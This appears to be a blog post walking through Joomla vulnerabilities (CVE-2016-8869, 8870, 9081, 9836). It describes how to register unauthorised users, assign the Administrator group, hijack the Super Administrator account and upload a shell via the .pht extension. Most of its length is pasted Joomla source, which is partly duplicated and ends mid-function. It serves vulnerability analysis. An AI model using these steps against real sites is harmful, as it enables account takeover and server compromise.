Uncategorized exploit, joomla, rce 0 comments

Retrospective: Joomla accounts modification and other disasters.

Hi, guys!

Today I want to tell you about last Joomla vulnerabilities. Issues I want to talk about are

CVE-2016-8869, CVE-2016-8870, CVE-2016-9081, CVE-2016-9836 and CVE-2016-9838.

I guess you already know about first three CVE because of Joomla is a very popular CMS around the world and these problems found a few month ago. But I have some words about exploitation and bug itself.

Let’s start with fast bug details.

There are two methods for user registration exists — UsersControllerRegistration and UsersControllerUser. You can find it inside /components/com_users/controllers/registration.php:108 and /components/com_users/controllers/user.php:293. The first method is legal and used by Joomla itself for user registrations. Second doesn’t call from anywhere but we can call it with a custom request to a server. To build it you need to take real register POST request then change task parameter from registration.register to user.register and use user array instead of jform.

Let’s cut to the chase.

Send it and a new user will be created ignoring allowUserRegistration = false setting. Welcome to the CVE-2016-8870 issue. Let’s look at the response details. Be cool and use var_dump as a debugger 😉

As you can see groups array parameter of a created user is exists. You can manually set group of a new user inside POST request like that:

Pay attention on group id. It’s 7 — Administrator. There is CVE-2016-8869. Unfortunately, you cannot create a user with Super Administrator privileges at once because JUser class have some checks to prevent that:

<?php
/**
 * @package Joomla.Platform
 * @subpackage User
 *
 * @copyright Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license GNU General Public License version 2 or later; see LICENSE
 */

defined('JPATH_PLATFORM') or die;

use Joomla\Registry\Registry;
use Joomla\Utilities\ArrayHelper;

/**
 * User class. Handles all application interaction with a user
 *
 * @since 11.1
 */
class JUser extends JObject
{
 /**
 * A cached switch for if this user has root access rights.
 *
 * @var boolean
 * @since 11.1
 */
 protected $isRoot = null;

 /**
 * Unique id
 *
 * @var integer
 * @since 11.1
 */
 public $id = null;

 /**
 * The user's real name (or nickname)
 *
 * @var string
 * @since 11.1
 */
 public $name = null;

 /**
 * The login name
 *
 * @var string
 * @since 11.1
 */
 public $username = null;

 /**
 * The email
 *
 * @var string
 * @since 11.1
 */
 public $email = null;

 /**
 * MD5 encrypted password
 *
 * @var string
 * @since 11.1
 */
 public $password = null;

 /**
 * Clear password, only available when a new password is set for a user
 *
 * @var string
 * @since 11.1
 */
 public $password_clear = '';

 /**
 * Block status
 *
 * @var integer
 * @since 11.1
 */
 public $block = null;

 /**
 * Should this user receive system email
 *
 * @var integer
 * @since 11.1
 */
 public $sendEmail = null;

 /**
 * Date the user was registered
 *
 * @var datetime
 * @since 11.1
 */
 public $registerDate = null;

 /**
 * Date of last visit
 *
 * @var datetime
 * @since 11.1
 */
 public $lastvisitDate = null;

 /**
 * Activation hash
 *
 * @var string
 * @since 11.1
 */
 public $activation = null;

 /**
 * User parameters
 *
 * @var Registry
 * @since 11.1
 */
 public $params = null;

 /**
 * Associative array of user names => group ids
 *
 * @var array
 * @since 11.1
 */
 public $groups = array();

 /**
 * Guest status
 *
 * @var boolean
 * @since 11.1
 */
 public $guest = null;

 /**
 * Last Reset Time
 *
 * @var string
 * @since 12.2
 */
 public $lastResetTime = null;

 /**
 * Count since last Reset Time
 *
 * @var int
 * @since 12.2
 */
 public $resetCount = null;

 /**
 * Flag to require the user's password be reset
 *
 * @var int
 * @since 3.2
 */
 public $requireReset = null;

 /**
 * User parameters
 *
 * @var Registry
 * @since 11.1
 */
 protected $_params = null;

 /**
 * Authorised access groups
 *
 * @var array
 * @since 11.1
 */
 protected $_authGroups = null;

 /**
 * Authorised access levels
 *
 * @var array
 * @since 11.1
 */
 protected $_authLevels = null;

 /**
 * Authorised access actions
 *
 * @var array
 * @since 11.1
 */
 protected $_authActions = null;

 /**
 * Error message
 *
 * @var string
 * @since 11.1
 */
 protected $_errorMsg = null;

 /**
 * JUserWrapperHelper object
 *
 * @var JUserWrapperHelper
 * @since 3.4
 */
 protected $userHelper = null;

 /**
 * @var array JUser instances container.
 * @since 11.3
 */
 protected static $instances = array();

 /**
 * Constructor activating the default information of the language
 *
 * @param integer $identifier The primary key of the user to load (optional).
 * @param JUserWrapperHelper $userHelper The JUserWrapperHelper for the static methods.
 *
 * @since 11.1
 */
 public function __construct($identifier = 0, JUserWrapperHelper $userHelper = null)
 {
 if (null === $userHelper)
 {
 $userHelper = new JUserWrapperHelper;
 }

 $this->userHelper = $userHelper;

 // Create the user parameters object
 $this->_params = new Registry;

 // Load the user if it exists
 if (!empty($identifier))
 {
 $this->load($identifier);
 }
 else
 {
 // Initialise
 $this->id = 0;
 $this->sendEmail = 0;
 $this->aid = 0;
 $this->guest = 1;
 }
 }

 /**
 * Returns the global User object, only creating it if it doesn't already exist.
 *
 * @param integer $identifier The primary key of the user to load (optional).
 * @param JUserWrapperHelper $userHelper The JUserWrapperHelper for the static methods.
 *
 * @return JUser The User object.
 *
 * @since 11.1
 */
 public static function getInstance($identifier = 0, JUserWrapperHelper $userHelper = null)
 {
 if (null === $userHelper)
 {
 $userHelper = new JUserWrapperHelper;
 }

 // Find the user id
 if (!is_numeric($identifier))
 {
 if (!$id = $userHelper->getUserId($identifier))
 {
 // If the $identifier doesn't match with any id, just return an empty JUser.
 return new JUser;
 }
 }
 else
 {
 $id = $identifier;
 }

 // If the $id is zero, just return an empty JUser.
 // Note: don't cache this user because it'll have a new ID on save!
 if ($id === 0)
 {
 return new JUser;
 }

 // Check if the user ID is already cached.
 if (empty(self::$instances[$id]))
 {
 $user = new JUser($id, $userHelper);
 self::$instances[$id] = $user;
 }

 return self::$instances[$id];
 }

 /**
 * Method to get a parameter value
 *
 * @param string $key Parameter key
 * @param mixed $default Parameter default value
 *
 * @return mixed The value or the default if it did not exist
 *
 * @since 11.1
 */
 public function getParam($key, $default = null)
 {
 return $this->_params->get($key, $default);
 }

 /**
 * Method to set a parameter
 *
 * @param string $key Parameter key
 * @param mixed $value Parameter value
 *
 * @return mixed Set parameter value
 *
 * @since 11.1
 */
 public function setParam($key, $value)
 {
 return $this->_params->set($key, $value);
 }

 /**
 * Method to set a default parameter if it does not exist
 *
 * @param string $key Parameter key
 * @param mixed $value Parameter value
 *
 * @return mixed Set parameter value
 *
 * @since 11.1
 */
 public function defParam($key, $value)
 {
 return $this->_params->def($key, $value);
 }

 /**
 * Method to check JUser object authorisation against an access control
 * object and optionally an access extension object
 *
 * @param string $action The name of the action to check for permission.
 * @param string $assetname The name of the asset on which to perform the action.
 *
 * @return boolean True if authorised
 *
 * @since 11.1
 */
 public function authorise($action, $assetname = null)
 {
 // Make sure we only check for core.admin once during the run.
 if ($this->isRoot === null)
 {
 $this->isRoot = false;

 // Check for the configuration file failsafe.
 $config = JFactory::getConfig();
 $rootUser = $config->get('root_user');

 // The root_user variable can be a numeric user ID or a username.
 if (is_numeric($rootUser) && $this->id > 0 && $this->id == $rootUser)
 {
 $this->isRoot = true;
 }
 elseif ($this->username && $this->username == $rootUser)
 {
 $this->isRoot = true;
 }
 else
 {
 // Get all groups against which the user is mapped.
 $identities = $this->getAuthorisedGroups();
 array_unshift($identities, $this->id * -1);

 if (JAccess::getAssetRules(1)->allow('core.admin', $identities))
 {
 $this->isRoot = true;

 return true;
 }
 }
 }

 return $this->isRoot ? true : JAccess::check($this->id, $action, $assetname);
 }

 /**
 * Method to return a list of all categories that a user has permission for a given action
 *
 * @param string $component The component from which to retrieve the categories
 * @param string $action The name of the section within the component from which to retrieve the actions.
 *
 * @return array List of categories that this group can do this action to (empty array if none). Categories must be published.
 *
 * @since 11.1
 */
 public function getAuthorisedCategories($component, $action)
 {
 // Brute force method: get all published category rows for the component and check each one
 // TODO: Modify the way permissions are stored in the db to allow for faster implementation and better scaling
 $db = JFactory::getDbo();

 $subQuery = $db->getQuery(true)
 ->select('id,asset_id')
 ->from('#__categories')
 ->where('extension = ' . $db->quote($component))
 ->where('published = 1');

 $query = $db->getQuery(true)
 ->select('c.id AS id, a.name AS asset_name')
 ->from('(' . (string) $subQuery . ') AS c')
 ->join('INNER', '#__assets AS a ON c.asset_id = a.id');
 $db->setQuery($query);
 $allCategories = $db->loadObjectList('id');
 $allowedCategories = array();

 foreach ($allCategories as $category)
 {
 if ($this->authorise($action, $category->asset_name))
 {
 $allowedCategories[] = (int) $category->id;
 }
 }

 return $allowedCategories;
 }

 /**
 * Gets an array of the authorised access levels for the user
 *
 * @return array
 *
 * @since 11.1
 */
 public function getAuthorisedViewLevels()
 {
 if ($this->_authLevels === null)
 {
 $this->_authLevels = array();
 }

 if (empty($this->_authLevels))
 {
 $this->_authLevels = JAccess::getAuthorisedViewLevels($this->id);
 }

 return $this->_authLevels;
 }

 /**
 * Gets an array of the authorised user groups
 *
 * @return array
 *
 * @since 11.1
 */
 public function getAuthorisedGroups()
 {
 if ($this->_authGroups === null)
 {
 $this->_authGroups = array();
 }

 if (empty($this->_authGroups))
 {
 $this->_authGroups = JAccess::getGroupsByUser($this->id);
 }

 return $this->_authGroups;
 }

 /**
 * Clears the access rights cache of this user
 *
 * @return void
 *
 * @since 3.4.0
 */
 public function clearAccessRights()
 {
 $this->_authLevels = null;
 $this->_authGroups = null;
 $this->isRoot = null;
 JAccess::clearStatics();
 }

 /**
 * Pass through method to the table for setting the last visit date
 *
 * @param integer $timestamp The timestamp, defaults to 'now'.
 *
 * @return boolean True on success.
 *
 * @since 11.1
 */
 public function setLastVisit($timestamp = null)
 {
 // Create the user table object
 $table = $this->getTable();
 $table->load($this->id);

 return $table->setLastVisit($timestamp);
 }

 /**
 * Method to get the user parameters
 *
 * This method used to load the user parameters from a file.
 *
 * @return object The user parameters object.
 *
 * @since 11.1
 * @deprecated 12.3 (Platform) & 4.0 (CMS) - Instead use JUser::getParam()
 */
 public function getParameters()
 {
 // @codeCoverageIgnoreStart
 JLog::add('JUser::getParameters() is deprecated. JUser::getParam().', JLog::WARNING, 'deprecated');

 return $this->_params;

 // @codeCoverageIgnoreEnd
 }

 /**
 * Method to get the user parameters
 *
 * @param object $params The user parameters object
 *
 * @return void
 *
 * @since 11.1
 */
 public function setParameters($params)
 {
 $this->_params = $params;
 }

 /**
 * Method to get the user table object
 *
 * This function uses a static variable to store the table name of the user table to
 * instantiate. You can call this function statically to set the table name if
 * needed.
 *
 * @param string $type The user table name to be used
 * @param string $prefix The user table prefix to be used
 *
 * @return object The user table object
 *
 * @note At 4.0 this method will no longer be static
 * @since 11.1
 */
 public static function getTable($type = null, $prefix = 'JTable')
 {
 static $tabletype;

 // Set the default tabletype;
 if (!isset($tabletype))
 {
 $tabletype['name'] = 'user';
 $tabletype['prefix'] = 'JTable';
 }

 // Set a custom table type is defined
 if (isset($type))
 {
 $tabletype['name'] = $type;
 $tabletype['prefix'] = $prefix;
 }

 // Create the user table object
 return JTable::getInstance($tabletype['name'], $tabletype['prefix']);
 }

 /**
 * Method to bind an associative array of data to a user object
 *
 * @param array &$array The associative array to bind to the object
 *
 * @return boolean True on success
 *
 * @since 11.1
 */
 public function bind(&$array)
 {
 // Let's check to see if the user is new or not
 if (empty($this->id))
 {
 // Check the password and create the crypted password
 if (empty($array['password']))
 {
 $array['password'] = $this->userHelper->genRandomPassword();
 $array['password2'] = $array['password'];
 }

 // Not all controllers check the password, although they should.
 // Hence this code is required:
 if (isset($array['password2']) && $array['password'] != $array['password2'])
 {
 JFactory::getApplication()->enqueueMessage(JText::_('JLIB_USER_ERROR_PASSWORD_NOT_MATCH'), 'error');

 return false;
 }

 $this->password_clear = ArrayHelper::getValue($array, 'password', '', 'string');

 $array['password'] = $this->userHelper->hashPassword($array['password']);

 // Set the registration timestamp
 $this->set('registerDate', JFactory::getDate()->toSql());

 // Check that username is not greater than 150 characters
 $username = $this->get('username');

 if (strlen($username) > 150)
 {
 $username = substr($username, 0, 150);
 $this->set('username', $username);
 }
 }
 else
 {
 // Updating an existing user
 if (!empty($array['password']))
 {
 if ($array['password'] != $array['password2'])
 {
 $this->setError(JText::_('JLIB_USER_ERROR_PASSWORD_NOT_MATCH'));

 return false;
 }

 $this->password_clear = ArrayHelper::getValue($array, 'password', '', 'string');

 // Check if the user is reusing the current password if required to reset their password
 if ($this->requireReset == 1 && $this->userHelper->verifyPassword($this->password_clear, $this->password))
 {
 $this->setError(JText::_('JLIB_USER_ERROR_CANNOT_REUSE_PASSWORD'));

 return false;
 }

 $array['password'] = $this->userHelper->hashPassword($array['password']);

 // Reset the change password flag
 $array['requireReset'] = 0;
 }
 else
 {
 $array['password'] = $this->password;
 }
 }

 if (array_key_exists('params', $array))
 {
 $this->_params->loadArray($array['params']);

 if (is_array($array['params']))
 {
 $params = (string) $this->_params;
 }
 else
 {
 $params = $array['params'];
 }

 $this->params = $params;
 }

 // Bind the array
 if (!$this->setProperties($array))
 {
 $this->setError(JText::_('JLIB_USER_ERROR_BIND_ARRAY'));

 return false;
 }

 // Make sure its an integer
 $this->id = (int) $this->id;

 return true;
 }

 /**
 * Method to save the JUser object to the database
 *
 * @param boolean $updateOnly Save the object only if not a new user
 * Currently only used in the user reset password method.
 *
 * @return boolean True on success
 *
 * @since 11.1
 * @throws RuntimeException
 */
 public function save($updateOnly = false)
 {
 // Create the user table object
 $table = $this->getTable();
 $this->params = (string) $this->_params;
 $table->bind($this->getProperties());

 // Allow an exception to be thrown.
 try
 {
 // Check and store the object.
 if (!$table->check())
 {
 $this->setError($table->getError());

 return false;
 }

 // If user is made a Super Admin group and user is NOT a Super Admin

 // @todo ACL - this needs to be acl checked

 $my = JFactory::getUser();

 // Are we creating a new user
 $isNew = empty($this->id);

 // If we aren't allowed to create new users return
 if ($isNew && $updateOnly)
 {
 return true;
 }

 // Get the old user
 $oldUser = new JUser($this->id);

 // Access Checks

 // The only mandatory check is that only Super Admins can operate on other Super Admin accounts.
 // To add additional business rules, use a user plugin and throw an Exception with onUserBeforeSave.

 // Check if I am a Super Admin
 $iAmSuperAdmin = $my->authorise('core.admin');

 $iAmRehashingSuperadmin = false;

 if (($my->id == 0 && !$isNew) && $this->id == $oldUser->id && $oldUser->authorise('core.admin') && $oldUser->password != $this->password)
 {
 $iAmRehashingSuperadmin = true;
 }

 // We are only worried about edits to this account if I am not a Super Admin.
 if ($iAmSuperAdmin != true && $iAmRehashingSuperadmin != true)
 {
 // I am not a Super Admin, and this one is, so fail.
 if (!$isNew && JAccess::check($this->id, 'core.admin'))
 {
 throw new RuntimeException('User not Super Administrator');
 }

 if ($this->groups != null)
 {
 // I am not a Super Admin and I'm trying to make one.
 foreach ($this->groups as $groupId)
 {
 if (JAccess::checkGroup($groupId, 'core.admin'))
 {
 throw new RuntimeException('User not Super Administrator');
 }
 }
 }
 }

 // Fire the onUserBeforeSave event.
 JPluginHelper::importPlugin('user');
 $dispatcher = JEventDispatcher::getInstance();

 $result = $dispatcher->trigger('onUserBeforeSave', array($oldUser->getProperties(), $isNew, $this->getProperties()));

 if (in_array(false, $result, true))
 {
 // Plugin will have to raise its own error or throw an exception.
 return false;
 }

 // Store the user data in the database
 $result = $table->store();

 // Set the id for the JUser object in case we created a new user.
 if (empty($this->id))
 {
 $this->id = $table->get('id');
 }

 if ($my->id == $table->id)
 {
 $registry = new Registry;
 $registry->loadString($table->params);
 $my->setParameters($registry);
 }

 // Fire the onUserAfterSave event
 $dispatcher->trigger('onUserAfterSave', array($this->getProperties(), $isNew, $result, $this->getError()));
 }
 catch (Exception $e)
 {
 $this->setError($e->getMessage());

 return false;
 }

 return $result;
 }

 /**
 * Method to delete the JUser object from the database
 *
 * @return boolean True on success
 *
 * @since 11.1
 */
 public function delete()
 {
 JPluginHelper::importPlugin('user');

 // Trigger the onUserBeforeDelete event
 $dispatcher = JEventDispatcher::getInstance();
 $dispatcher->trigger('onUserBeforeDelete', array($this->getProperties()));

 // Create the user table object
 $table = $this->getTable();

 if (!$result = $table->delete($this->id))
 {
 $this->setError($table->getError());
 }

 // Trigger the onUserAfterDelete event
 $dispatcher->trigger('onUserAfterDelete', array($this->getProperties(), $result, $this->getError()));

 return $result;
 }

 /**
 * Method to load a JUser object by user id number
 *
 * @param mixed $id The user id of the user to load
 *
 * @return boolean True on success
 *
 * @since 11.1
 */
 public function load($id)
 {
 // Create the user table object
 $table = $this->getTable();

 // Load the JUserModel object based on the user id or throw a warning.
 if (!$table->load($id))
 {
 // Reset to guest user
 $this->guest = 1;

 JLog::add(JText::sprintf('JLIB_USER_ERROR_UNABLE_TO_LOAD_USER', $id), JLog::WARNING, 'jerror');

 return false;
 }

 /*
 * Set the user parameters using the default XML file. We might want to
 * extend this in the future to allow for the ability to have custom
 * user parameters, but for right now we'll leave it how it is.
 */

 $this->_params->loadString($table->params);

 // Assuming all is well at this point let's bind the data
 $this->setProperties($table->getProperties());

 // The user is no longer a guest
 if ($this->id != 0)
 {
 $this->guest = 0;
 }
 else
 {
 $this->guest = 1;
 }

 return true;
 }

 /**
 * Method to allow serialize the object with minimal properties.
 *
 * @return array The names of the properties to include in serialization.
 *
 * @since 3.6.0
 */
 public function __sleep()
 {
 return array('id');
 }

 /**
 * Method to recover the full object on unserialize.
 *
 * @return void
 *
 * @since 3.6.0
 */
 public function __wakeup()
 {
 // Initialise some variables
 $this->userHelper = new JUserWrapperHelper;
 $this->_params = new Registry;

 // Load the user if it exists
 if (!empty($this->id))
 {
 $this->load($this->id);
 }
 else
 {
 // Initialise
 $this->id = 0;
 $this->sendEmail = 0;
 $this->aid = 0;
 $this->guest = 1;
 }
 }
}

744

745

746

747

748

749

750

751

752

753

754

755

756

757

758

759

760

761

762

763

764

765

766

767

768

769

770

771

772

773

774

775

776

777

778

779

// The only mandatory check is that only Super Admins can operate on other Super Admin accounts.

// To add additional business rules, use a user plugin and throw an Exception with onUserBeforeSave.

// Check if I am a Super Admin

$iAmSuperAdmin = $my->authorise('core.admin');

$iAmRehashingSuperadmin = false;

if (($my->id == 0 && !$isNew) && $this->id == $oldUser->id && $oldUser->authorise('core.admin') && $oldUser->password != $this->password)

{

$iAmRehashingSuperadmin = true;

}

// We are only worried about edits to this account if I am not a Super Admin.

if ($iAmSuperAdmin != true && $iAmRehashingSuperadmin != true)

{

// I am not a Super Admin, and this one is, so fail.

if (!$isNew && JAccess::check($this->id, 'core.admin'))

{

throw new RuntimeException('User not Super Administrator');

}

if ($this->groups != null)

{

// I am not a Super Admin and I'm trying to make one.

foreach ($this->groups as $groupId)

{

if (JAccess::checkGroup($groupId, 'core.admin'))

{

throw new RuntimeException('User not Super Administrator');

}

// Fire the onUserBeforeSave event.

Now you can log in as created administrator and try to upload a file. Thanks to Xiphos Research Labs for shell file upload bypass with .pht extension (CVE-2016-9836). Guys from Xiphos also write the exploit to automate stack of CVE-2016-8869, CVE-2016-8870, and CVE-2016-9836 bugs.

It’s all good and very useful but waits for a second. What about CVE-2016-9081? The description says: “Incorrect use of unfiltered data allows for existing user accounts to be modified; to include resetting their username, password, and user group assignments”.

That’s right, we don’t need to create an account with only Administrator privileges because we can change login, email and password of existing Superadmin account.

For that operation, I need to know the only ID of that account. Where can I take it? The simplest way is register admin (ID=7), then log in administrator panel go to “Users” page and write down super admin ID. A piece of cake.

Let’s see to the POST request for change user data of existing account.

Look at the user[groups][] value. There is an empty line. It needs for preventing script to replace group ID with the default value (ID=2 — Registred).

But we have one more problem here. After user creation, it blocked and need to be activated. Token for that will be sent to email from the request. But Joomla doesn’t allow you to change super administrator account as we can already see. Let’s see to this part of code:

<?php
/**
 * @package Joomla.Site
 * @subpackage com_users
 *
 * @copyright Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Registration model class for Users.
 *
 * @since 1.6
 */
class UsersModelRegistration extends JModelForm
{
 /**
 * @var object The user registration data.
 * @since 1.6
 */
 protected $data;

 /**
 * Constructor
 *
 * @param array $config An array of configuration options (name, state, dbo, table_path, ignore_request).
 *
 * @since 3.6
 *
 * @throws Exception
 */
 public function __construct($config = array())
 {
 $config = array_merge(
 array(
 'events_map' => array('validate' => 'user')
 ), $config
 );

 parent::__construct($config);
 }

 /**
 * Method to activate a user account.
 *
 * @param string $token The activation token.
 *
 * @return mixed False on failure, user object on success.
 *
 * @since 1.6
 */
 public function activate($token)
 {
 $config = JFactory::getConfig();
 $userParams = JComponentHelper::getParams('com_users');
 $db = $this->getDbo();

 // Get the user id based on the token.
 $query = $db->getQuery(true);
 $query->select($db->quoteName('id'))
 ->from($db->quoteName('#__users'))
 ->where($db->quoteName('activation') . ' = ' . $db->quote($token))
 ->where($db->quoteName('block') . ' = ' . 1)
 ->where($db->quoteName('lastvisitDate') . ' = ' . $db->quote($db->getNullDate()));
 $db->setQuery($query);

 try
 {
 $userId = (int) $db->loadResult();
 }
 catch (RuntimeException $e)
 {
 $this->setError(JText::sprintf('COM_USERS_DATABASE_ERROR', $e->getMessage()), 500);

 return false;
 }

 // Check for a valid user id.
 if (!$userId)
 {
 $this->setError(JText::_('COM_USERS_ACTIVATION_TOKEN_NOT_FOUND'));

 return false;
 }

 // Load the users plugin group.
 JPluginHelper::importPlugin('user');

 // Activate the user.
 $user = JFactory::getUser($userId);

 // Admin activation is on and user is verifying their email
 if (($userParams->get('useractivation') == 2) && !$user->getParam('activate', 0))
 {
 $uri = JUri::getInstance();

 // Compile the admin notification mail values.
 $data = $user->getProperties();
 $data['activation'] = JApplicationHelper::getHash(JUserHelper::genRandomPassword());
 $user->set('activation', $data['activation']);
 $data['siteurl'] = JUri::base();
 $base = $uri->toString(array('scheme', 'user', 'pass', 'host', 'port'));
 $data['activate'] = $base . JRoute::_('index.php?option=com_users&task=registration.activate&token=' . $data['activation'], false);

 // Remove administrator/ from activate url in case this method is called from admin
 if (JFactory::getApplication()->isAdmin())
 {
 $adminPos = strrpos($data['activate'], 'administrator/');
 $data['activate'] = substr_replace($data['activate'], '', $adminPos, 14);
 }

 $data['fromname'] = $config->get('fromname');
 $data['mailfrom'] = $config->get('mailfrom');
 $data['sitename'] = $config->get('sitename');
 $user->setParam('activate', 1);
 $emailSubject = JText::sprintf(
 'COM_USERS_EMAIL_ACTIVATE_WITH_ADMIN_ACTIVATION_SUBJECT',
 $data['name'],
 $data['sitename']
 );

 $emailBody = JText::sprintf(
 'COM_USERS_EMAIL_ACTIVATE_WITH_ADMIN_ACTIVATION_BODY',
 $data['sitename'],
 $data['name'],
 $data['email'],
 $data['username'],
 $data['activate']
 );

 // Get all admin users
 $query->clear()
 ->select($db->quoteName(array('name', 'email', 'sendEmail', 'id')))
 ->from($db->quoteName('#__users'))
 ->where($db->quoteName('sendEmail') . ' = ' . 1);

 $db->setQuery($query);

 try
 {
 $rows = $db->loadObjectList();
 }
 catch (RuntimeException $e)
 {
 $this->setError(JText::sprintf('COM_USERS_DATABASE_ERROR', $e->getMessage()), 500);

 return false;
 }

 // Send mail to all users with users creating permissions and receiving system emails
 foreach ($rows as $row)
 {
 $usercreator = JFactory::getUser($row->id);

 if ($usercreator->authorise('core.create', 'com_users'))
 {
 $return = JFactory::getMailer()->sendMail($data['mailfrom'], $data['fromname'], $row->email, $emailSubject, $emailBody);

 // Check for an error.
 if ($return !== true)
 {
 $this->setError(JText::_('COM_USERS_REGISTRATION_ACTIVATION_NOTIFY_SEND_MAIL_FAILED'));

 return false;
 }
 }
 }
 }
 // Admin activation is on and admin is activating the account
 elseif (($userParams->get('useractivation') == 2) && $user->getParam('activate', 0))
 {
 $user->set('activation', '');
 $user->set('block', '0');

 // Compile the user activated notification mail values.
 $data = $user->getProperties();
 $user->setParam('activate', 0);
 $data['fromname'] = $config->get('fromname');
 $data['mailfrom'] = $config->get('mailfrom');
 $data['sitename'] = $config->get('sitename');
 $data['siteurl'] = JUri::base();
 $emailSubject = JText::sprintf(
 'COM_USERS_EMAIL_ACTIVATED_BY_ADMIN_ACTIVATION_SUBJECT',
 $data['name'],
 $data['sitename']
 );

 $emailBody = JText::sprintf(
 'COM_USERS_EMAIL_ACTIVATED_BY_ADMIN_ACTIVATION_BODY',
 $data['name'],
 $data['siteurl'],
 $data['username']
 );

 $return = JFactory::getMailer()->sendMail($data['mailfrom'], $data['fromname'], $data['email'], $emailSubject, $emailBody);

 // Check for an error.
 if ($return !== true)
 {
 $this->setError(JText::_('COM_USERS_REGISTRATION_ACTIVATION_NOTIFY_SEND_MAIL_FAILED'));

 return false;
 }
 }
 else
 {
 $user->set('activation', '');
 $user->set('block', '0');
 }

 // Store the user object.
 if (!$user->save())
 {
 $this->setError(JText::sprintf('COM_USERS_REGISTRATION_ACTIVATION_SAVE_FAILED', $user->getError()));

 return false;
 }

 return $user;
 }

 /**
 * Method to get the registration form data.
 *
 * The base form data is loaded and then an event is fired
 * for users plugins to extend the data.
 *
 * @return mixed Data object on success, false on failure.
 *
 * @since 1.6
 */
 public function getData()
 {
 if ($this->data === null)
 {
 $this->data = new stdClass;
 $app = JFactory::getApplication();
 $params = JComponentHelper::getParams('com_users');

 // Override the base user data with any data in the session.
 $temp = (array) $app->getUserState('com_users.registration.data', array());

 foreach ($temp as $k => $v)
 {
 $this->data->$k = $v;
 }

 // Get the groups the user should be added to after registration.
 $this->data->groups = array();

 // Get the default new user group, Registered if not specified.
 $system = $params->get('new_usertype', 2);

 $this->data->groups[] = $system;

 // Unset the passwords.
 unset($this->data->password1);
 unset($this->data->password2);

 // Get the dispatcher and load the users plugins.
 $dispatcher = JEventDispatcher::getInstance();
 JPluginHelper::importPlugin('user');

 // Trigger the data preparation event.
 $results = $dispatcher->trigger('onContentPrepareData', array('com_users.registration', $this->data));

 // Check for errors encountered while preparing the data.
 if (count($results) && in_array(false, $results, true))
 {
 $this->setError($dispatcher->getError());
 $this->data = false;
 }
 }

 return $this->data;
 }

 /**
 * Method to get the registration form.
 *
 * The base form is loaded from XML and then an event is fired
 * for users plugins to extend the form with extra fields.
 *
 * @param array $data An optional array of data for the form to interogate.
 * @param boolean $loadData True if the form is to load its own data (default case), false if not.
 *
 * @return JForm A JForm object on success, false on failure
 *
 * @since 1.6
 */
 public function getForm($data = array(), $loadData = true)
 {
 // Get the form.
 $form = $this->loadForm('com_users.registration', 'registration', array('control' => 'jform', 'load_data' => $loadData));

 // When multilanguage is set, a user's default site language should also be a Content Language
 if (JLanguageMultilang::isEnabled())
 {
 $form->setFieldAttribute('language', 'type', 'frontend_language', 'params');
 }

 if (empty($form))
 {
 return false;
 }

 return $form;
 }

 /**
 * Method to get the data that should be injected in the form.
 *
 * @return mixed The data for the form.
 *
 * @since 1.6
 */
 protected function loadFormData()
 {
 $data = $this->getData();

 $this->preprocessData('com_users.registration', $data);

 return $data;
 }

 /**
 * Override preprocessForm to load the user plugin group instead of content.
 *
 * @param JForm $form A JForm object.
 * @param mixed $data The data expected for the form.
 * @param string $group The name of the plugin group to import (defaults to "content").
 *
 * @return void
 *
 * @since 1.6
 * @throws Exception if there is an error in the form event.
 */
 protected function preprocessForm(JForm $form, $data, $group = 'user')
 {
 $userParams = JComponentHelper::getParams('com_users');

 // Add the choice for site language at registration time
 if ($userParams->get('site_language') == 1 && $userParams->get('frontend_userparams') == 1)
 {
 $form->loadFile('sitelang', false);
 }

 parent::preprocessForm($form, $data, $group);
 }

 /**
 * Method to auto-populate the model state.
 *
 * Note. Calling getState in this method will result in recursion.
 *
 * @return void
 *
 * @since 1.6
 */
 protected function populateState()
 {
 // Get the application object.
 $app = JFactory::getApplication();
 $params = $app->getParams('com_users');

 // Load the parameters.
 $this->setState('params', $params);
 }

 /**
 * Method to save the form data.
 *
 * @param array $temp The form data.
 *
 * @return mixed The user id on success, false on failure.
 *
 * @since 1.6
 */
 public function register($temp)
 {
 $params = JComponentHelper::getParams('com_users');

 // Initialise the table with JUser.
 $user = new JUser;
 $data = (array) $this->getData();

 // Merge in the registration data.
 foreach ($temp as $k => $v)
 {
 $data[$k] = $v;
 }

 // Prepare the data for the user object.
 $data['email'] = JStringPunycode::emailToPunycode($data['email1']);
 $data['password'] = $data['password1'];
 $useractivation = $params->get('useractivation');
 $sendpassword = $params->get('sendpassword', 1);

 // Check if the user needs to activate their account.
 if (($useractivation == 1) || ($useractivation == 2))
 {
 $data['activation'] = JApplicationHelper::getHash(JUserHelper::genRandomPassword());
 $data['block'] = 1;
 }

 // Bind the data.
 if (!$user->bind($data))
 {
 $this->setError(JText::sprintf('COM_USERS_REGISTRATION_BIND_FAILED', $user->getError()));

 return false;
 }

 // Load the users plugin group.
 JPluginHelper::importPlugin('user');

 // Store the data.
 if (!$user->save())
 {
 $this->setError(JText::sprintf('COM_USERS_REGISTRATION_SAVE_FAILED', $user->getError()));

 return false;
 }

 $config = JFactory::getConfig();
 $db = $this->getDbo();
 $query = $db->getQuery(true);

 // Compile the notification mail values.
 $data = $user->getProperties();
 $data['fromname'] = $config->get('fromname');
 $data['mailfrom'] = $config->get('mailfrom');
 $data['sitename'] = $config->get('sitename');
 $data['siteurl'] = JUri::root();

 // Handle account activation/confirmation emails.
 if ($useractivation == 2)
 {
 // Set the link to confirm the user email.
 $uri = JUri::getInstance();
 $base = $uri->toString(array('scheme', 'user', 'pass', 'host', 'port'));
 $data['activate'] = $base . JRoute::_('index.php?option=com_users&task=registration.activate&token=' . $data['activation'], false);

 // Remove administrator/ from activate url in case this method is called from admin
 if (JFactory::getApplication()->isAdmin())
 {
 $adminPos = strrpos($data['activate'], 'administrator/');
 $data['activate'] = substr_replace($data['activate'], '', $adminPos, 14);
 }

 $emailSubject = JText::sprintf(
 'COM_USERS_EMAIL_ACCOUNT_DETAILS',
 $data['name'],
 $data['sitename']
 );

 if ($sendpassword)
 {
 $emailBody = JText::sprintf(
 'COM_USERS_EMAIL_REGISTERED_WITH_ADMIN_ACTIVATION_BODY',
 $data['name'],
 $data['sitename'],
 $data['activate'],
 $data['siteurl'],
 $data['username'],
 $data['password_clear']
 );
 }
 else
 {
 $emailBody = JText::sprintf(
 'COM_USERS_EMAIL_REGISTERED_WITH_ADMIN_ACTIVATION_BODY_NOPW',
 $data['name'],
